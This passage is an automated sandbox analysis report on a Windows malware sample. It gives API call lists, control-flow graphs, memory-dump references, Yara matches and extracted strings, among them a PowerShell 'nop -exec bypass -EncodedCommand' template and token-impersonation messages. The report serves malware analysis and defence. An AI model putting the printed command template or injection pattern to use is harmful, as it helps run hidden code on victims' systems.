                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocCreateProtectThread
                                                                  • String ID:
                                                                  • API String ID: 3039780055-0
                                                                  • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                                                                  • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                                                                  • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                                                                  • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 431 401704-40175c CreateFileA 432 40179c-4017a5 431->432 433 40175e-401760 431->433 434 401781-40178f CloseHandle 433->434 435 401762-40177f ReadFile 433->435 434->432 435->434 436 401791-40179a 435->436 436->433
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleRead
                                                                  • String ID:
                                                                  • API String ID: 1035965006-0
                                                                  • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                                                                  • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                                                                  • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                                                                  • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 437 66f118-66f12a 438 66f14e-66f150 437->438 439 66f12c-66f136 call 6925e0 437->439 441 66f152-66f159 438->441 442 66f1c9-66f1d1 438->442 444 66f13c-66f13e 439->444 441->442 443 66f15b-66f1c2 call 67b434 * 2 call 67b454 * 4 441->443 443->442 446 66f144 444->446 447 66f1d2-66f1e3 call 6925d8 call 680414 444->447 446->438
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CleanupStartup
                                                                  • String ID:
                                                                  • API String ID: 915672949-0
                                                                  • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                                  • Instruction ID: e884fee1bb4c98631f262bdf6907ae2d834792547d9a64c214e260f98231aede
                                                                  • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                                  • Instruction Fuzzy Hash: B2112D70601B42C6FB24AB60F86936432DBEB46344F50043D97194B3ABDF7E85A9CB15

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 463 1b96b4-1b971e 464 1b9723-1b972c 463->464 465 1b994f-1b9963 464->465 466 1b9732-1b97b6 call 1b8b64 LoadLibraryA 464->466 469 1b97bb-1b97c4 466->469 470 1b97ca-1b97d0 469->470 471 1b993c-1b994a 469->471 472 1b98a9-1b9910 call 1b8b64 470->472 473 1b97d6-1b97ee 470->473 471->464 476 1b9913-1b9927 472->476 473->472 475 1b97f4-1b98a7 473->475 475->476 478 1b9929-1b9932 476->478 479 1b9937 476->479 478->479 479->469
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                                  • Instruction ID: efd88f1dba25db5d1f0e43baab4af7ca16a4ccce529ffc94f2ae934aebaebbcd
                                                                  • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                                  • Instruction Fuzzy Hash: 7E619936219B8486CAA4CB1AE49035AB7A4F7C9B98F544125EFCE83B28DF3DD555CB00

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 481 403040-403051 call 401950 call 4017f8 486 403058-40305f SleepEx 481->486 486->486
                                                                  APIs
                                                                    • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                                                                    • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                                                                    • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                                                                    • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                                                                  • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$CountCreateThreadTickmalloc
                                                                  • String ID:
                                                                  • API String ID: 345437100-0
                                                                  • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                                                                  • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                                                                  • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                                                                  • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 487 1b9324-1b9358 488 1b935e-1b9374 487->488 489 1b944d-1b9453 487->489 488->489 493 1b937a-1b93c2 488->493 490 1b9479-1b9482 489->490 491 1b9455-1b9474 VirtualAlloc 489->491 491->490 495 1b93ce-1b93d4 493->495 496 1b9402-1b9408 495->496 497 1b93d6-1b93de 495->497 496->489 498 1b940a-1b9445 496->498 497->496 499 1b93e0-1b93e6 497->499 498->489 499->496 500 1b93e8-1b9400 499->500 500->495
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                                                  • Instruction ID: f8e345c21f6f9c9e839c43a71cb4834d3fbaf0f1daad40beabb24e80c0c04f1e
                                                                  • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                                                  • Instruction Fuzzy Hash: 12419772628B8487DB64CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                  • String ID: U
                                                                  • API String ID: 3902385426-4171548499
                                                                  • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                                  • Instruction ID: ec14a26c44d62a4c083659281745be02a7e1ba2226b7defda2d8e2cb297eb1e3
                                                                  • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                                  • Instruction Fuzzy Hash: 9902357231468186DB20EF28E4843AEB767F785B48F540216FB8987B58DF3EC956CB11
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 00678FA0
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00678FD9
                                                                  • Process32First.KERNEL32 ref: 00678FFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                                                                  • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                                                  • API String ID: 718051232-1833344708
                                                                  • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                                  • Instruction ID: 752ecabde62a66407af9c842d5c33e994ba71729f6791cc7c402b3997ffc8998
                                                                  • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                                  • Instruction Fuzzy Hash: A8726D21B44641C6DB68DB2698583B913D3B789BC0FA4C126DE0F87B59EE39CD87CB41
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682FFD
                                                                    • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                                                                    • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                                                                    • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                                                                  • _errno.LIBCMT ref: 00683002
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • _fileno.LIBCMT ref: 0068302F
                                                                    • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                                                                    • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                                                                  • write_multi_char.LIBCMT ref: 0068366B
                                                                  • write_string.LIBCMT ref: 00683688
                                                                  • write_multi_char.LIBCMT ref: 006836A5
                                                                  • write_string.LIBCMT ref: 00683704
                                                                  • write_string.LIBCMT ref: 0068373B
                                                                  • write_multi_char.LIBCMT ref: 0068375D
                                                                  • free.LIBCMT ref: 00683771
                                                                  • _isleadbyte_l.LIBCMT ref: 00683842
                                                                  • write_char.LIBCMT ref: 00683858
                                                                  • write_char.LIBCMT ref: 00683879
                                                                  • _errno.LIBCMT ref: 0068397C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00683987
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID: $@
                                                                  • API String ID: 3318157856-1077428164
                                                                  • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                                  • Instruction ID: 553c916e11350bd172c27715927b5fa2c9722ca7020bfaf0cce802a564827fec
                                                                  • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                                  • Instruction Fuzzy Hash: D34244B26086A486EB25EF19D5543BE6BB3F741F90F140305DE4A17B98EB79CB41CB01
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682589
                                                                    • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                                                                    • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                                                                    • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                                                                  • _errno.LIBCMT ref: 0068258E
                                                                    • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                                                                  • _fileno.LIBCMT ref: 006825BB
                                                                    • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                                                                    • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                                                                  • write_multi_char.LIBCMT ref: 00682BEB
                                                                  • write_string.LIBCMT ref: 00682C08
                                                                  • write_multi_char.LIBCMT ref: 00682C25
                                                                  • write_string.LIBCMT ref: 00682C84
                                                                  • write_string.LIBCMT ref: 00682CBB
                                                                  • write_multi_char.LIBCMT ref: 00682CDD
                                                                  • free.LIBCMT ref: 00682CF1
                                                                  • _isleadbyte_l.LIBCMT ref: 00682DC2
                                                                  • write_char.LIBCMT ref: 00682DD8
                                                                  • write_char.LIBCMT ref: 00682DF9
                                                                  • _errno.LIBCMT ref: 00682EF3
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00682EFE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID:
                                                                  • API String ID: 3318157856-3916222277
                                                                  • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                                  • Instruction ID: 2896283ac4f2a1ac83dbb9fac2a01ee60df2fa2cca1931e9dd44a3f7c29ad242
                                                                  • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                                  • Instruction Fuzzy Hash: 3D32547220868686EF29EF15D5643BE6FB3FB45B94F241305DE4A17B68DB78C841CB40
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C23FD
                                                                    • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                                                                    • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                                                                    • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                                                                  • _errno.LIBCMT ref: 001C2402
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • _fileno.LIBCMT ref: 001C242F
                                                                    • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                                                                    • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                                                                  • write_multi_char.LIBCMT ref: 001C2A6B
                                                                  • write_string.LIBCMT ref: 001C2A88
                                                                  • write_multi_char.LIBCMT ref: 001C2AA5
                                                                  • write_string.LIBCMT ref: 001C2B04
                                                                  • write_string.LIBCMT ref: 001C2B3B
                                                                  • write_multi_char.LIBCMT ref: 001C2B5D
                                                                  • free.LIBCMT ref: 001C2B71
                                                                  • _isleadbyte_l.LIBCMT ref: 001C2C42
                                                                  • write_char.LIBCMT ref: 001C2C58
                                                                  • write_char.LIBCMT ref: 001C2C79
                                                                  • _errno.LIBCMT ref: 001C2D7C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001C2D87
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID: $@
                                                                  • API String ID: 3318157856-1077428164
                                                                  • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                                                  • Instruction ID: 894fc212aefd36256bb4a76e233e0adf7cc69257a1cca1681f47039ea8f6e663
                                                                  • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                                                  • Instruction Fuzzy Hash: E8421032608B9487EB29CF59D544FBE7BB0B775B84F24100EDE4A47AA8DB78C840CB01
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C1989
                                                                    • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                                                                    • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                                                                    • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                                                                  • _errno.LIBCMT ref: 001C198E
                                                                    • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                                                                  • _fileno.LIBCMT ref: 001C19BB
                                                                    • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                                                                    • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                                                                  • write_multi_char.LIBCMT ref: 001C1FEB
                                                                  • write_string.LIBCMT ref: 001C2008
                                                                  • _errno.LIBCMT ref: 001C22F3
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 001C22FE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                                                  • String ID: -$0
                                                                  • API String ID: 3246410048-417717675
                                                                  • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                                                  • Instruction ID: a41121ecebb48c11a1d8c2787aaf8ced3d8e74097b573b9f87d3053120b2844f
                                                                  • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                                                  • Instruction Fuzzy Hash: 8D3225726486D496EB29CB55D544FBE7BB0F776784F28100EEF4A47AA9DB38C840CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                  • String ID: U
                                                                  • API String ID: 3902385426-4171548499
                                                                  • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                                                  • Instruction ID: 22f53ffff2642abfb00545f65aa01530eb72d904a6e8a21be2e57ddf3167229a
                                                                  • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                                                  • Instruction Fuzzy Hash: F7022533214B8186DB208F28E484BAEB776F7A5798F54011EEB8943B54DF3DE985CB10
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 00677D66
                                                                  • _snprintf.LIBCMT ref: 00677D83
                                                                  • _snprintf.LIBCMT ref: 00677CA5
                                                                    • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                                                                    • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                                                                  • _snprintf.LIBCMT ref: 00677FD8
                                                                  • _snprintf.LIBCMT ref: 00678334
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                                                  • API String ID: 3442832105-1222817042
                                                                  • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                                  • Instruction ID: f165d54bb1ff977ae2693509bbd572190c045ac707b9e2ef795a30137aa3c4d4
                                                                  • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                                  • Instruction Fuzzy Hash: B032E962614E8592EB258F2DE0452E9B3B1FF98799F049101EF8D17B21EF38D6A7C344
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 00671C63
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                    • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                                                                    • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                                                                  • GetCurrentDirectoryA.KERNEL32 ref: 00671CDB
                                                                  • FindFirstFileA.KERNEL32 ref: 00671D14
                                                                  • GetLastError.KERNEL32 ref: 00671D23
                                                                  • free.LIBCMT ref: 00671D5E
                                                                  • free.LIBCMT ref: 00671D6B
                                                                    • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                                                                    • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                                                                    • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                                                                  • FileTimeToSystemTime.KERNEL32 ref: 00671D78
                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00671D89
                                                                  • FindNextFileA.KERNEL32 ref: 00671E46
                                                                  • FindClose.KERNEL32 ref: 00671E57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                                                  • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                                                  • API String ID: 723279517-1754256099
                                                                  • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                                  • Instruction ID: fb2f42af140046c5152ca76007fff4314e7617e9a63a981f5e9d9da63bfdfffd
                                                                  • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                                  • Instruction Fuzzy Hash: D051CF7270875196DB50DF66E8507AEA3A2F385B84F40402AEE4E47B58EF7CC60ACB40
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 001B7166
                                                                  • _snprintf.LIBCMT ref: 001B7183
                                                                  • _snprintf.LIBCMT ref: 001B70A5
                                                                    • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                                                                    • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                                                                  • _snprintf.LIBCMT ref: 001B73D8
                                                                  • _snprintf.LIBCMT ref: 001B7734
                                                                  Strings
                                                                  • nop -exec bypass -EncodedCommand "%s", xrefs: 001B74D7
                                                                  • not create token: %d, xrefs: 001B7657
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                                                                  • API String ID: 3442832105-3652497171
                                                                  • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                                                  • Instruction ID: 2f9b2cb9d9b2c9bc8f052c9aa5cc4283acf63cc8586ad332c123fcfba5c15db3
                                                                  • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                                                  • Instruction Fuzzy Hash: 5732FC62618EC492EB259F2DE0413E9B3B0FFA8799F445501DF8917B65EF38D2A6C340
                                                                  APIs
                                                                  • CreateProcessAsUserA.ADVAPI32 ref: 00670F8F
                                                                  • GetLastError.KERNEL32 ref: 00670F9D
                                                                  • GetLastError.KERNEL32 ref: 00670FC1
                                                                    • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                                                                    • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                                                                  • CreateProcessA.KERNEL32 ref: 00671013
                                                                  • GetLastError.KERNEL32 ref: 0067101D
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 00671374
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 00671388
                                                                  • CreateProcessWithTokenW.ADVAPI32 ref: 006713D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                                                  • String ID:
                                                                  • API String ID: 3044875250-0
                                                                  • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                                  • Instruction ID: ddd496feb17ee8c2b893683ede9fb43acc4ce5d056f1b139581cf5cf7671d55c
                                                                  • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                                  • Instruction Fuzzy Hash: EA619B72214B40D6EB20DF25E89435E73A6F749B94F10812AEA4E87B18DF7DC8A5CB50
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0067924F
                                                                    • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
